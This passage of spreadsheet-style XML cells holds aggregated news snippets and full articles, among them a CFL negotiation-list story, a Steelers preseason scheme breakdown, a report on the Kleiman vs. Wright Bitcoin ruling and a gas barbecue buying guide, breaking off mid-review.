    <t>If the Canadian draft forms the foundation of a roster in the CFL, general managers use the negotiation list as a wish list of how they’d like to fill in the remaining spots on their rosters with talent. With the CFL’s summer negotiation list reveal, fans get a glimpse of what teams across the league are looking for, both in terms of immediate needs and for the future. Thursday’s reveal shows 10 players from each team for a total of 90 players. The neg list is the primary method that teams use to secure some of its top American talent. Whether it’s scouts or GMs identifying talent in-person in the NCAA or NFL, or as simple as seeing someone they like in a game on TV, they can add that player to their 45-man negotiation list, giving them exclusive rights to that player should they decide to play in the CFL. RELATED: CFL reveals list of 10 negotiation list players for each team QB Bryce Perkins is on the Eskimos negotiation list (University of Virginia) “Obviously there’s always a push to get more fan interest and allow fans to see what’s going on,” BC Lions GM Ed Hervey said. “I think what you’ll find is that trying to get fan interest in everything that’s going on with their respective teams, whether that’s the daily transactions or the neg list, or top-10 neg list players…I don’t see a negative in fans having that information.” Hervey cautions, though, that the list is fluid. That’s especially so as the calendar moves forward and NFL teams finalize their rosters at the end of the month coming out of training camp. “I’d say the list changes, especially during NFL camp time and during football season you can change it anywhere from two players a week to two players a month,” Hervey said. “It all depends on the information that we get from the players that are on the list. Sometimes you find out they’re injured, they’ve had surgery or they’re no longer interested in playing and so you replace those guys. “You might be watching a college football game and you see someone that’s lights out. You want to wait a little longer for someone like that. Seeing as how we only have 45 spots we have to be very selective. You have to prioritize how many players are in university, how many players are in the NFL and how many are free agents.” Teams approach their neg lists in slightly different ways. Every year, we hear about a high-profile NFL or college player on a team’s list. Colin Kaepernick, for example, had been on the Montreal Alouettes’ negotiation list while hoping an NFL team would sign him as a free agent. Other GMs avoid the high-profile names that are unlikely to ever play in the CFL and instead focus on players they see as future fits on their rosters. Looking back at the past neg list reveals, Winnipeg has shown and signed some of its top players. Marcus Sayles (DB), Chris Streveler (QB) and Lucky Whitehead (WR) were all introduced to CFL fans through the list reveal. Another Bomber that made a big impact in his CFL debut last week, Janarion Grant, was on the Alouettes’ 10-man list on Dec. 12, 2018. Grant spent time on the Ticats’ practice roster in June before signing in Winnipeg on July 23.</t>
  </si>
  <si>
    <t>PARKINSON’S disease is a long-term degenerative disorder of the central nervous system. One often overlooked symptom is hidden in a person’s nose. Do you have this nose symptom? Daily Express :: Health Feed Parkinson’s disease warning: The unusual sign in your nose that could be a warning</t>
  </si>
  <si>
    <t>One man has been taken to hospital in life-threatening condition following the crash, which is now under investigation.</t>
  </si>
  <si>
    <t>Angus has been an integral figure for Warringah for a number of years and his latest gong is on top of his Catchpole Medals in 2012 and 2014.</t>
  </si>
  <si>
    <t>MINDHUNTER season 2 dropped on Netflix today. The series is based on the experience of real FBI agents John E Douglas and Robert K Ressler. Douglas recently revealed the one case that haunts him to this day, which was briefly mentioned in the first series of Mindhunter Daily Express :: TV and Radio Feed</t>
  </si>
  <si>
    <t>Madeline Palmer</t>
  </si>
  <si>
    <t>Authorities believe a fire that ripped through Gingin District High School overnight, causing an estimated $2.5 million in damage and destroying two classrooms, was deliberately lit.</t>
  </si>
  <si>
    <t>Kristy O'Brien</t>
  </si>
  <si>
    <t>Survivor is a word thrown around fairly lightly, but in the case of German migrant Frauke Bolton-Boshammer, you can't help but feel she's earned the title 10 times over.</t>
  </si>
  <si>
    <t>With just 12 months to go until it’s set to open, the Raiders‘ new stadium in Las Vegas finally has a name. The team announced on Monday that the new $1.9 billion building will be called Allegiant Stadium. The naming rights for the stadium were purchased by Allegiant Air. The fact that the airline is headquartered in Vegas is a big reason why the Raiders decided to team up with them, according to team president Marc Badain. “We’re thrilled that our future home will be known as Allegiant Stadium,” Badain said in a statement. “As the hometown airline, Allegiant is the perfect partner to showcase the incredible support we continue to receive from the Southern Nevada community. We are grateful to all involved who worked diligently to make Allegiant Stadium a reality.” Although it’s not clear how much Allegiant</t>
  </si>
  <si>
    <t>Jaguars’ backup quarterback Gardner Minshew had his second professional start Thursday night against the Eagles at TIAA Bank Field in Jacksonville, FL. Source: Sports Business News</t>
  </si>
  <si>
    <t>The result is an improvement on last year, but is still the airline's third-worst performance during seven straight years of losses..</t>
  </si>
  <si>
    <t>Top Attractions, Seoul (South Korea) – Travel Guide The post Top Attractions, Seoul (South Korea) – Travel Guide appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>Marnus Labuschagne's impressive return to the Test arena has left selectors facing a big call for the next match.</t>
  </si>
  <si>
    <t>Corapmafya</t>
  </si>
  <si>
    <t>Seems like a good price if you are already a member. Two ways to look at it: $3.37 for 8x Precision Clean heads with 2x free Cross Action OR $2.69 each if you don't particularly care about which head you are using.</t>
  </si>
  <si>
    <t>The wp-support-plus-responsive-ticket-system plugin before 4.1 for WordPress has JavaScript injection. Published at: August 22, 2019 at 08:15PM View on NVD website The post New vulnerability on the NVD: CVE-2014-10391 appeared first on Secured Me.</t>
  </si>
  <si>
    <t>Artists in the self-declared republic of Somaliland are challenging state repression and conservative Muslim clerics. The post Somaliland’s poets and singers fight to be heard appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>The managing director of a hotel has published a full page advertisement calling for an urgent public forum to discuss air services in Geraldton.</t>
  </si>
  <si>
    <t>Leaks say that it's a beast. A rumor runs that the graphic processing unit of the PlayStation 5 is a bit of a monster. Everything comes from The conclusions of the user Twitter Komachi, put in context by Another Twitter user is a parrot. Basically, leaks suggest that the supposed graphics processor of the PS5 is being tested – and that it is powerful. Read the full article on pushsquare.com .</t>
  </si>
  <si>
    <t>It Chapter Two debuts in cinemas next month. See full article at Film-news.co.uk » The post Jessica Chastain gets emotional over It Chapter Two hate crime scene appeared first on www.cinemagotrailers.co.uk.</t>
  </si>
  <si>
    <t>Experts are not sure whether the dam wall will need a large-scale repair or a complete rebuild. Read more? Click here</t>
  </si>
  <si>
    <t>World of Warcraft Classic is upon us, and we can say that the launch demand has remained high. Players on the biggest servers took hours to queue, and Blizzard warned people to leave overcrowded realms even before these servers were put into service. You might even need a lot of queue time on servers that do not seem to be full, as it turns out that the influx of players has even denied the population statistics. "The way the public display currently works when servers are in service is that the high, medium, and low levels are dynamically determined, in terms of the most populated domains," says Blizzard. on the official forums. "So, a kingdom with hard enough queues (say 4k to 5k) might end up appearing as medium because you're not Faerlina, Herod, etc." This is the desired functionality – and exactly how it would have worked in the original game – "but the unprecedented size of the queues on a handful of aberrant realms deviates the algorithm."</t>
  </si>
  <si>
    <t>Source: https://www.theverge.com/2019/8/20/20807113/youtube-lawsuit-lgbtq-chase-ross-chrissy-chambers-community-creators LGBTQ YouTubers love the site — that’s why they’re suing it Chase Ross started his YouTube channel to talk about his experience as an out-and-proud trans person in 2010. The friends he found through YouTube, he told The Verge, saved his life. Now, nine years later, Ross feels like the platform that he once called a supportive home is unrecognizable and actually harmful to his community. Ross is one of eight creators — alongside Amp Somers, Lindsay Amer, Chris Knight, Celso Dulay, Cameron Stiehl, and Chrissy Chambers — attempting to fight YouTube over a number of systemic issues that the LGBTQ community say they’ve faced on the platform. In a lawsuit filed last week, these creators allege that YouTube hinders their channels by incorrectly restricting viewership of videos and not placing ads on… Continue reading… Source: https://www.theverge.com/2019/8/20/20807113/youtube-lawsuit-lgbtq-chase-ross-chrissy-chambers-community-creators The post LGBTQ YouTubers love the site — that’s why they’re suing it appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>Photo by Justin Berl/Getty Images The Pittsburgh Steelers and Tampa Bay Buccaneers squared off Friday night, and let’s look at just how they did it. As I write this, the captain has just informed us that we are cruising at thirty-two thousand feet somewhere over Nebraska. From my view out the window, the landscape below is a sea of green sectioned into neatly organized squares and rectangles. It’s a beautiful bit of geographic geometry. I am flying home after an amazing week with the family at Yosemite. For those of you who haven’t been, I strongly recommend putting it on your bucket list. I had seen plenty of Yosemite images in books and documentaries but the majesty of it up close is something to behold. It’s so stunning that it feels surreal. The Boeing 757 jet I’m currently wedged into is short on comforts. It does, however, come with a small television set built into the headrest of the seat in front of me. I’m watching ESPN, where the crawl at the bottom of the screen just announced that Antonio Brown is threatening to quit over a helmet grievance. I have no idea what that means but it made me chuckle. Namaste, Steelers Nation. Namaste. Gloriously, the airline’s cable package also includes the NFL Network, where momentarily the Steelers will kick off the pre-season against Tampa Bay. I should get to watch most of it before our plane lands. I’ll watch the rest on the DVR at home. I realize by the time this story runs there will have already been a good amount of discussion about how the rookies looked and how the quarterbacks played. I will stay away from those types of evaluations. Instead, I will focus on the coaching staff. What personnel groups are they using on offense or sub-packages on defense? What concepts or schemes are they working on? This is week one of pre-season so the X and O’s will be pretty vanilla. Still, they will give us a window into how we might operate down the road. Here, then, are my observations for pre-season game number one: 1ST QUARTER First drive for Tampa. They go to a tried-and-true early season move and run a heavy dose of 12 personnel with unbalanced sets. That’s the “we’re going to pound the rock and establish our toughness” move by old friend Bruce Arians. The Steelers counter with their base 3-4 and roll Terrell Edmunds down as an 8th box defender. Standard operating procedure. When the Bucs switch to 11 personnel, the Steelers counter with their 2-4-5. Dan McCullers out, Mike Hilton in. Hilton blitzes right away and they play cover-1 behind it. FWIW, the TV broadcast just showed a graphic introducing the Steelers starting defense and they had 12 guys up there in a 3-4-5 configuration. Congrats to Keith Butler for figuring out how to get an extra player on the field. It’s a thirteen-play touchdown drive for the Bucs. The Steelers go 3-4 versus every 12p set and 2-4-5 whenever Tampa is in 11. Lots of cover-1, which is tough on rookie corner Justin Layne. The Bucs pick on him. Steelers first possession. They go no-huddle and hit James Washington for a big gain. Then it’s back-to-back play-action passes with some pocket movement by Josh Dobbs. Interesting opening for the offense. Randy Fichtner is scripting to Dobbs’ strengths (deep ball, deception/mobility) whereas BA targeted our weaknesses by using heavy personnel against our backup DL and throwing at Layne. That’s the difference between having an experienced QB (Jameis Winston) versus a young one (Dobbs). With the experienced guy you can take what’s there. With the young guy you have to run what he can execute. Tampa’s second series on offense. Bucs have a 3rd and 5 and show their first 10 personnel group of the night. Steelers play 2-4-5 and bring linebacker Mark Barron on a stunt. The pressure forces a quick throw from QB Blaine Gabbert that nearly turns into a pick-six by Devin Bush. Another slot blitz from Hilton out of the 2-4-5. Butler has been very aggressive with his second-level blitzes so far. 2ND QUARTER 4th and 1 for Tampa at the Steelers 16. No field goal for BA. He’s going to challenge his OL here. Bucs 12 personnel versus our base 3-4 plus one (Edmunds). The result? Loss of two yards. No slant, twist or stem by Butler – just the big guys up front not getting moved and Devin Bush being a heck of a football player. I said I wasn’t going to talk about players but I have to add a note about Bush. Early as it may be, he is demonstrating tremendous instincts. He finds seams really quickly and can redirect at full speed. Watch Bush, aligned at right inside backer, take the gap on the 4th and 1 play then immediately get flat to make the tackle: If he turns out to be as good as he looks so far he is going to allow Butler to get very aggressive with his scheme. He will be able to blitz Barron and Vince Williams to occupy offensive linemen and let Bush run to the football. That’s exciting. Steelers back on offense. “Benny Snell Football” will be a lot more effective when the defensive line isn’t relocating the line of scrimmage two yards into the backfield. Tampa’s front seven is playing downhill like the field is tilted. I’m not going to say it looks like they know Benny is getting the ball. But it looks like they know Benny is getting the ball. A couple of pocket throws and no max pass protections for Dobbs. It’s nice to see Fichtner has taken the training wheels off. Dobbs is less effective running these concepts, however. He’s better off of play-action or reacting to a single read. 7:12 left in the half and the Steelers run their first offensive snap in something other than 11p. It’s a 12p set with Christian Scott-Williamson as the 2nd TE opposite Xavier Grimble. Grimble looks bigger and stronger, which is important since the Steelers like two-tight end groups. They’re great for creating single coverage on Juju but only if we can run the football from them. To do that, Grimble’s progress as a blocker will be essential. Three and out by the Bucs. Mason Rudolph in at QB. The Steelers go right to the timing routes. A couple of quick-outs and a beautiful back-shoulder fade to Washington for a touchdown. Rudolph doesn’t have Dobbs’ arm strength but his reads are cleaner and the ball is out faster. The play-calling approach is definitely different between Dobbs and Rudolph. Bucs football with 1:56 left in the half. The Steelers show cover-2 but rotate post-snap to cover-1. Jordan Dangerfield is aligned 15 yards deep at safety and comes sprinting down at the snap to cover the running back. The back stays in to block so Dangerfield rushes the QB. I literally have never seen a safety attempt to bring pressure from 15 yards deep before. It’s actually funny to watch. I know Jordan is trying to mask the coverage but he’s going to have to creep up a little in order to be effective. Two plays later and it’s another five-man pressure. Keith Butler is blitzing the heck out of Tampa tonight. Coach LeBeau must be ecstatic! On this one, Tyler Matakevich gets a sack/fumble and the Steelers recover. P.J. Locke runs the same concept Dangerfield ran a few plays earlier. You can see Locke show up late in the GIF below. It’s a great coverage disguise — rotate down from two-high to cover the back and keep coming if he stays in to block — but the safeties need to work on the timing. 3rd and 12 and the Steelers throw a dig route (a deep in) to Diontae Spencer. Good ball by Rudolph and a nice play by the DB to break it up. This is about the fifth time I’ve seen some version of a dig or deep cross. Fichtner clearly wants to attack the middle of the field in the passing game. Between Juju, Vance McDonald, Jaylen Samuels and their bevy of quick slot receivers, the Steelers will have plenty of ways to do this. The teams trade field goals to end the half. 13-10 Steelers. 3RD QUARTER Interesting start to the 3rd quarter. The Steelers come out in 12 personnel and go unbalanced (both tight ends on the same side of the line). They run a gap concept with a pulling guard and Snell hits it for a gain of five. The first half was pretty much all inside zone in the run game. Fichtner is more of a gap guy and transitioned the run game in that direction last season. It might be they were working on IZ in the first half and will work on gap in the second. Snell, by the way, looked tentative running the IZ scheme but Samuels hit one for 22 yards in the 2nd quarter. Samuels looks slimmer and quicker this summer. I love seeing that. Butler picks up right where he left off in the first half. He’s in 2-4-5 versus 11 personnel, blitzing and playing cover-1. This is obviously the design for the evening. Steelers ball. They return to the unbalanced look from 12 personnel. Rudolph hits Johnny Holton for a 60 yard catch and run on a mesh route, where two receivers criss-cross in the middle of the field at the linebacker level while a third runs up the seam and settles at about 15 yards. In the GIF below, we see the Bucs miscommunicate trying to cover all of the bodies moving in different directions. This is a great route against backers who do not excel in coverage. Two plays later, Rudolph hits rookie tight end Zach Gentry underneath the left upright for a touchdown. The Steelers look great attacking the middle of the field in the passing game. Gentry is probably a year away from being a varsity player but if they can get him to the point where he’s a serviceable blocker they will have great mismatches against smaller linebackers. 2nd and 20 for Tampa late in the quarter. The Steelers blitz again, bringing inside backer Ulysses Gilbert while leaving the other inside backer, Robert Spillane, in man coverage on the tight end. It’s nice coverage by Spillane but a great throw by quarterback Ryan Griffin for a first down. This might be a preview of things to come with Vince Williams or Mark Barron as the blitzer and Bush carrying the tight end in man. Devlin Hodges in at quarterback. My goodness, when he scrambles around in that #6 jersey he is Bubby Brister reincarnated… Seeing some bunch sets from Fichtner now with quick throws and counter gap runs. I love this look out of 12 personnel for the varsity offense with McDonald, Juju and Grimble/Samuels in the bunch with Moncrief or Washington solo on the other side of the formation. It really stresses a defense by compressing the bunch side with big bodies who can catch and block and putting a deep ball threat away from it. This is a set I’d like to see a bunch of this season. I apologize for the previous sentence. Touchdown pass from Hodges to Tevin Jones from an empty formation. Great pass protection from the OL as Hodges is able to reset his feet twice before throwing. Same thing happened on Rudolph’s TD throw to Gentry. The young guys on the OL haven’t gotten much of a push in the run game but new coach Shawn Sarrett appears to have them well-prepared in pass pro. That’s a good sign for the varsity, too. 4TH QUARTER It’s really interesting that on this Tampa drive that began with less than 9:00 to play and the Steelers up 30-16 that Keith Butler is still bringing heat from his deep reserves. They are twisting, looping and firing five and even six guys on every snap. Tampa, to their credit, is picking up the stunts and Griffin is moving the offense with well-placed throws under pressure. This could be one of two things on Butler’s part: seeing how the young players execute the playbook or setting a tone for how the Steelers intend to stay aggressive defensively. Maybe it’s both. Tampa scores. I guess the blitzes are more effective when you have guys on the field who can get to the quarterback. Fichtner must have gotten the same memo Butler did. 4:00 to play, up 30-22 and he’s in an empty set chucking the football. Hodges throwing quick screens, crossing routes, bootlegs. The whole enchilada. It’ll be interesting to see if this is pre-season play-calling or a sign of things to come. Tight end Kevin Rader just coughed up the ball after a nice catch and run. Let’s see what Butler does with the D needing a stop to seal the win. He’s still blitzing. And one of them gets there! Sack/forced fumble from Ulysses Gilbert! Somehow the Steelers fail to recover. Two plays later: another blitz and another sack from Gilbert. Griffin gets the Bucs into the end zone with :10 left. The Steelers stop the two-point conversion attempt with (wait for it) a blitz! Good guys win, 30-28. WHAT DID WE LEARN? Consider much of this with a grain of salt due to the fact it’s August 9th but there are some interesting takeaways as far as the scheme goes: Defensively, Keith Butler showed that he will continue to evolve into a matchup defense by using his sub packages to counter the personnel groupings of the offense. Tonight we saw him go base versus 12 personnel and 2-4-5 versus 11. Tampa didn’t show much else and Butler stayed out of situational packages. But early indications are we can expect a lot of two DL, five DB looks. Who earns that fifth DB role will be something to watch for as the pre-season unfolds. Butler also blitzed like it was going out of style and played a ton of cover-1 behind it. Did he do this because, with faster personnel this year, he intends to be more aggressive than he was last season? Did he want to see how his young players executed these schemes? Or was he throwing out a red herring for Bill Belichick since Belichick is likely to have already broken this film down and committed it to his cyborg memory? This, for me, was the most interesting thing we saw on defense tonight. Offensively, the run game looked the same as it did last year with zone and gap runs from predominantly 11 personnel formations. The gap stuff in the second half looked a little better than the zone stuff, likely because zone schemes are harder to block for young players who haven’t had time to build chemistry together. Frankly, there wasn’t much to see in the run game. The passing game was far more interesting. The Steelers attacked the middle of the field with great success and, given their receiving weapons, should continue to make money there as the season progresses. They appear to be able to stretch the field vertically as well. If they remain committed to their RPOs and quick throws and can protect the QB like they did tonight, they could have a tremendous passing attack Also, we saw a different approach in the passing game with Rudolph than we did with Dobbs. With Dobbs the attack is more vertical; with Rudolph, it’s more horizontal. The line has to protect a bit longer with Dobbs because his throws tend to be further down the field and he takes longer to process. He can bail the OL out with his legs though, which we saw tonight. With Rudolph the ball is out quickly and the defense must tighten the throwing windows because of his accuracy. He does not possess a canon or the ability to scramble, however. Rudolph is a bit more like Roethlisberger at this point in Ben’s career, which could give him an edge on Dobbs for the backup job. There you have it. A journal that began at 32,000 feet is literally being filed at sea level now as I’m safe on the ground back at the Jersey Shore. The Steelers are 1-0 in the pre-season and there is a lot to talk about. Looking forward to your thoughts in the comments below.</t>
  </si>
  <si>
    <t>Between dead partners, blind trusts and mythical Bitcoin billions, the web weaved by Craig Wright continues to get more and more tangled by the day. | Source: Shutterstock The judge presiding over the Kleiman vs. Wright trial ruled that 50% of all Bitcoin-related intellectual property created by Craig Wright prior to 2013 must be handed over to the estate of the deceased Dave Kleiman. Depending on how much you buy into the Craig Wright carnival show, that could turn out to be half of Satoshi Nakamoto’s legacy… or absolutely nothing whatsoever. The sole source of the claim that Wright and Kleiman mined 1 million BTC together is none other than Craig Wright himself. The Many Contradictions of Craig Wright Would-be Satoshi Nakamoto Craig Wright is in a million-Bitcoin pickle. | Source: YouTube As suggested in a post-trial breakdown by WizSec Bitcoin Research, Wright’s braggart claims about holding 1 million BTC were accepted by Judge Rheinart, and now work in Kleiman’s favor: “The judge takes CSW’s bitcoin ownership claims at face value; those lies now only work to Wright’s detriment, and the judge seems content to let Wright lie in the bed he made for himself.” The counsel for the plaintiff listed the many contradictions of Craig Wright regarding Dave Kleiman’s involvement with the alleged blind trust where his Bitcoin is secretly held. At various points in the trial, Wright or his defense have uttered the following contradictory statements on the subject: Dave has no rights to the trust, no ownership of the trust, no knowledge of the setup of the trust. Dave was asked simply to hold a part of some documents and keys that were split using Shamir’s Secret Sharing scheme so that he did not even know what he was actually holding. Neither Wright nor anyone else ever put Bitcoin into the trust, and that it never held or came to hold Bitcoin private keys. Whose Bitcoin Is it Anyway? Dead men tell no tales. Right? | Source: Shutterstock From a bystander’s viewpoint, it appears that the blind trust story was a way for Wright to explain why he couldn’t access the 1 million BTC he claimed to have owned. Roping in his deceased friend Dave Kleiman seemed a useful way to hide the tracks of his deception. After all, dead men tell no tales, right? But their families do. And when the Kleiman estate appeared to lay claim to half of the mythical Bitcoin fortune, that’s where Wright’s troubles began. Now he finds himself indebted to the tune of around $5 billion – and that doesn’t include all the coins from Bitcoin hard forks over the years, which are considered relevant related assets. Such poetic justice was not lost on either Judge Bloom or Judge Rheinart, both of whom used literary references to color their impressions of the proceedings. Both seem relevant now. Judge Bloom quoted Sir Walter Scott, writing: “Oh, what a tangled web we weave when first we practice to deceive.” Judge Rheinart referenced 17th-century English playwright John Dryden when he annotated his ruling with the following: “Apparently, dead men tell no tales, but they (perhaps) send bonded couriers…I completely reject Dr. Wright’s testimony about the alleged Tulip Trust, the alleged encrypted file, and his alleged inability to identify his bitcoin holdings.” If a courier shows up in 2020 carrying a dead man’s key, then the American judicial system will have been proved wrong. Until then, Craig Wright has a bill to pay. Disclaimer: The views expressed in the article are solely those of the author and do not represent those of, nor should they be attributed to, CCN.</t>
  </si>
  <si>
    <t>Lewis Hamilton has opened up on his retirement plans and spoken about what he predicts from Red Bull and Ferrari for the rest of the season. Daily Express :: Sport Feed</t>
  </si>
  <si>
    <t>LIVERPOOL will tussle with Manchester City for the FA Community Shield at Wembley Stadium this afternoon ahead of a new season of English football. Here is Express.co.uk’s guide to streaming Liverpool vs Man City online. Daily Express :: Tech Feed Liverpool vs Man City live stream: How to watch FA Community Shield online</t>
  </si>
  <si>
    <t>Derek Adams</t>
  </si>
  <si>
    <t>The gas versus charcoal BBQ argument has been raging since Chicago-born Don McGlaughlin’s gas-powered LazyMan first hit the market in the early 1950s. Today, most professional chefs and seasoned barbecuers will extol the virtues of charcoal over gas and it’s true that, psychologically at least, charcoal is a more primally satisfying way to grill meats and vegetables in the great outdoors. However, charcoal barbecuing does have its drawbacks, namely the length of time it takes for the charcoal to reach optimum temperature and the extra work involved in preventing the food from being scorched to a cinder. On the flip side, gas aficionados will argue that gas grilling produces a flavour just as authentically smoky as charcoal, only without the hassle. After all, given that the flavour of grilled meat is mostly produced by the smoke generated by meat fats dripping onto a heat source below, does it really matter whether that source is a pile of coals or a sheet of hot metal with a flaming gas ring beneath? One thing everyone agrees on is that gas barbecuing is a much more convenient and practical way to grill. Not only is the heat of a gas barbecue easier to control but it’ll reach optimum cooking temperature in about 10 minutes (a charcoal BBQ can take anything from 25 minutes to 45 minutes). Another bonus is that every gas barbecue comes equipped with a lid. Aside from deflecting wind that could blow out the flame, a lid also allows the user to grill using the “indirect” convection method of cooking; a much easier and more reliable way to grill meats than the open-top brazier design of some charcoal-based barbecues. It must be said, however, that there are a few caveats worth mentioning: gas barbecues are more expensive than their charcoal counterparts and they’re usually a bit more difficult to assemble. And, of course, you will also need to fork out on a gas canister. Speaking of which… All about gas Propane is the most common fuel for modern barbecues and Patio Gas is arguably the most popular brand. It’s available in 5kg (£22) and 13kg canisters (£34), but 5kg is the most practical size since it will fit underneath or behind the cupboards of most barbecue models. If using gas for the first time, you’ll need to sign a Cylinder Refill Agreement and hand over an additional £40 fee for the returnable cylinder. Thereafter, whenever the gas nears empty, simply take the empty bottle back to the supplier and pick up a new pre-filled one. Patio Gas canisters are fitted with a contents gauge so be sure to check the gas level well before your guests arrive because the last thing you need is for it to run out midway through the grilling process. Choosing a gas barbecue – things to consider Aside from price and build quality, the most important factor to consider is grill size and the number of burners the BBQ’s equipped with. The most popular size is equipped with two burners (individually controlled gas rings beneath a metal heat reflector). However, if you have a large family or entertain a lot then consider a model with three or four burners – a four-burner barbecue will provide almost twice the meal estate of a two burner. Some models are also equipped with a side burner, which is basically a small gas hob for cooking side dishes. We would suggest forgoing a side burner because not only are they fiddly to assemble and take up valuable shelf space, but they perform no better than a kitchen hob. Weber Spirit II E-210 GBS £422.10, Hayes Garden World Best for: BBQ aficionados Key specs – Grill size/area: 51 x 46 cm; Weight: 46.8kg; Burners: 2; Side burner: No; Shelves: 2; Portable: No 9 best kitchen knife sets 12 best non-stick frying pans 10 best garden knives You really can’t go wrong with a Weber. Not only are they built to last – some Webers have been known to survive over 10 years of winter weather without collapsing into a pile of rust – but they’re almost universally praised by both users and professionals. Designed for small patios and balconies, this sturdy entry-level two-burner model boasts a heavy-duty porcelain-coated lid with integral thermometer, a 51cm x 46cm Gourmet Barbecue System grate with a removable centre section for an optional griddle plate or pizza stone, a small warming rack, a gas bottle holder on the right to keep everything tidy, two side tables (one folding), and a new type of ignition system that almost always lights the gas ring on the first press of the button, even after months of use. The Spirit II is equipped with three piping hot heat reflector shields (or “flavorizer bars” as Weber likes to call them) that instantly vaporise dripping fats, producing that lovely smoky flavour we all love; a disposable tin foil tray beneath catches any excess fats. If you often serve food that is either undercooked or overdone, consider installing the optional iGrill 3 app-connected system, which monitors the internal temperatures of up to four cuts of meat and, when perfectly cooked, notifies you on your iOS or Android device. The build quality is exemplary; a fact borne out by the 10-year guarantee Weber offers on all parts. If you’re after a gas barbecue that fits nicely on a patio and doesn’t stretch the budget too much, then put this one high on your list of contenders. Buy Everdure by Heston Blumenthal Force £599, John Lewis &amp; Partners Best for: Style Key specs – Grill size/area: 2,358cm²; Weight: 33kg; Burners: 2; Side burner: No; Shelves: 2; Portable: No For size, style and efficiency, this minimalist two-burner model from chef Heston Blumenthal is a tough one to beat. Indeed, it’s one of the most thoughtfully designed BBQs available. Constructed almost entirely out of rust-resistant die-cast aluminium, the Force features two enamel-coated cast iron grates large enough to feed a gaggle of six hungry mouths, a beautifully designed lid that fits perfectly flush with the body ensuring that the heat is retained throughout the cooking process, four rock-solid legs (two with castors), a sturdy fold-out shelf for added convenience, and an integrated temperature dial. It also comes with arguably the most accurate control dials in barbecue-land. In order to prevent flare-ups caused by too much fat dripping onto the heat source below, this barbecue’s cooking grate is equipped with solid sections positioned directly above the burners, thereby negating the need for a heat reflector. This system, combined with the aluminium lid’s cutaway vents, ensures food is cooked perfectly evenly. Indeed, we found no cool spots anywhere on the grill – a common anomaly with gas barbecues. Available in five tantalising colours, the Force is anything but cheap, but that’s to be expected given the quality and fit of the materials used. It’s also easy to use and cooks food to succulent perfection without ever breaking into a sweat. A top choice for well-heeled grillers. Buy Char-Broil All-Star 120B £341, Garden Lines Best for: Patios and small gardens Key specs – Grill size/area: 45cm; Weight: 30kg; Burners: 1; Side burner: No; Shelves: 2; Portable: Yes This newly-launched model from Char-Broil can be used with or without the supplied leg assembly if, say, you wanted to put the main unit on a table or lug it to the beach. Its cast iron grate provides a moderately sized cooking area of 1,600 cm² (45cm in diameter), plus there’s a small warming rack above. The attractively shaped cast aluminium lid, meanwhile, ensures optimum convection when cooking indirectly, while the handy thermometer keeps tabs on operating temperatures. Char-Broil is one of the most popular BBQ manufacturers stateside, partly because of its unique “TRU-Infrared” grilling technology. In this instance, the use of the term infrared has nothing to do with infrared bulbs but rather it’s simply a perforated corrugated metal sheet that sits directly below the cooking grate. Having grilled on a few Char-Broil models to date, we can vouch that it definitely helps distribute heat evenly across the entire grilling grate, producing uniform results in the process. However, it is advisable to clean the infrared sheet after each session by running the barbecue on its highest heat setting for about 10 minutes and then brushing off the carbonised material. The All-Star comes with two foldable side shelves with integral tool holders, a second mid-cart side shelf with a handy paper towel dispenser, a concealed area for the gas bottle and reliable push-button ignition. A very well thought out and exceedingly versatile package that’s ideal for smaller patios and balconies. Buy Primus Kuchoma £143.99 (price correct at time of publishing), Amazon Best for: Portability Key specs – Grill size/area: 40 x 24 cm; Weight: 5.3kg; Burners: 1; Side burner: No; Shelves: No; Portable: Yes If you’re in the market for a portable one- or two-person gas grill that’s ideal for camping, orienteering, boating, picnics or balcony use, consider this fabulous new model from outdoor pursuit specialist Primus. The Kuchoma weighs just 4.5 kilograms and comes with a hinged aluminium lid for both direct and indirect grilling, an integrated wooden carry handle, a non-stick 40cm x 24cm grate with raised edges to keep sausages from rolling off, and battery-less Piezo ignition. To use, simply pull out the admittedly wiry legs, attach the hose to a mini screw-on gas canister – available in 100g, 230g and 450g sizes and widely available from all camping stores and most campsites – fire it up, lift the lid and load on some grub. To test it out, we threw on a dozen chicken legs (its maximum capacity) and, while there wasn’t much space left to move them around, it grilled them remarkably well with plenty of gas left in the 230g tank for another round. We were also impressed by the height of the lid, which is easily tall enough to accommodate a small chicken or leg of lamb. In the realm of camping cookers, this little griller ticks many boxes – it’s light and small enough to carry a fair distance (it measures just 44cm wide and 30.5cm deep), is quick to set up and a doddle to clean. Buy Campingaz Master 3 Series Classic LS £317.46, Keen Gardener Best for: Large families Key specs – Grill size/area: 2,800cm²; Weight: 57kg; Burners: 3; Side burner: Yes; Shelves: 2; Portable: No Campingaz is synonymous with camping cookers and gas-powered lamps but it’s branching out into bigger things – much bigger things – with a recently launched range of large two-, three- and four-burner garden barbecues that are stylish and efficient enough to take on the big guns. This ginormous three-burner model is a case in point. The Master 3 Series arrived in a massive box on a palette and took over two hours to build, but the effort was worth it. A lift of its double-walled enamelled lid exposes a steel grill on the left and a flat griddle plate on the right, with a combined surface area of 2,800cm². This is a great combination since it allows you to cook standard fare, like burgers, sausages and chicken legs, on one side and fish, halloumi, bacon, eggs and other obstreperous ingredients that normally break up and fall through the gaps on the other. It’s a boon for vegetarians and vegans too, who’ll appreciate having their food kept completely separate from the meats. The Master 3 Series also comes with a large cupboard to store a 5kg Patio Gas bottle, a foldable shelf strong enough to sit on, and a 2,300 watt Piezo ignition side burner that also converts into an extra shelf. We loaded it with a variety of ingredients – including the classic bacon wrapped banana – and it grilled everything to succulent perfection. A great budget choice for larger families and party animals. Buy Weber Q1200 £323.99 (price correct at time of publishing), Amazon Best for: Balconies and boats Key specs – Grill size/area: 43 x 32 cm; Weight: 12kg; Burners: 1; Side burner: No; Shelves: 2; Portable: Yes Like the Primus Kuchoma, this portable from Weber uses the same type of readily available mini disposable 450g gas canisters, making it ideal for camp sites that don’t allow the use of charcoal, plus boating and balcony use. However, unlike the Kuchoma, this one is too big and cumbersome to lug by hand (it weighs 12kg and doesn’t come with a carry handle). The single-burner Q1200 is equipped with a hinged cast aluminium lid for maximum convection and a heavy duty cast iron grate with a cooking area of 43cm x 32cm – more than enough space for a family of three, or four at a push. It also comes with a lid-mounted thermometer, a pair of flip-out shelves and a disposable slide-out drip tray. To use, simply screw on a canister, place it in the supplied cradle, press the ignition button and throw on some meat. The ultimate test for any barbecue is how well it cooks a steak. Well this one passed with flying colours. Firstly, its integrated thermometer gave a reading of nearly 600˚C after just 